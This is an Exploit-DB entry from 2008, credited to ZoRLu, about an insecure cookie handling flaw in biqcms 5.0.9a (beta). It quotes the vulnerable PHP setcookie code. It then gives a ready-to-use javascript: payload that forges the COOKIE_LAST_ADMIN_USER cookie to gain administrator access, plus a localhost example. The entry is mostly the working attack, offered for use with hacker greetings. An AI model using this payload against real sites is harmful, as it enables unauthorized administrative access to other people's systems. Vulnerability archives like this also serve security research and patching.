exploit-db-mirror/exploits/php/webapps/6886.txt

biqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability
[~]
[~] donwload: http://sourceforge.net/project/showfiles.php?group_id=143555&package_id=232638&release_id=636935
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 30.10.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: a.q kpss : ) )
[~]
[~] -----------------------------------------------------------

code:

        setcookie ("COOKIE_LAST_ADMIN_USER", $newAdmin["username"], time()+8640000, '/');
        setcookie ("COOKIE_LAST_ADMIN_LANG", $newAdmin["use_language_id"], time()+8640000, '/');


Exploit:

javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";

example for my localhost:

javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=zorlu; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  r00tsecurity.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------


# milw0rm.com [2008-10-31]